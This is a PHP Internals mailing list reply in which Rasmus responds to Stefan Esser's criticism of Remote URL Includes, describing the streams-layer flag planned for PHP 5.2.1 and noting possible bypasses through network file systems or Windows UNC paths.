Stefan Esser wrote: > It is very good that bugs in PHP Applications are bad for PHP's image. > The majority of servers get hacked because of Remote URL Includes (and > not by XSS/SQL Injection). The existance of Remote URL Includes is fully > to blame on the PHP engine and is UNIQUE. After years the feature is > still not kicked out of PHP. In PHP 5.2.1 there will be a configuration > option that activates an (incomplete) blacklist. Everyone should know by > now that blacklists are BAD.
I am not sure I would call it a blacklist. It is a flag in the streams layer that marks stream handlers that could possibly make a network connection as such and there are only a finite set of stream handlers. Assuming we have marked the right streams, which I think we have at this point, the only way to trick it would be to bounce through some sort of file system network mechanism like auto-mounted file systems or perhaps some \\Server\path\foo.php thing on Windows, but at that level I think it is up to the local sysadmin to make sure the PHP scripts can't get to something they shouldn't. -Rasmus -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php
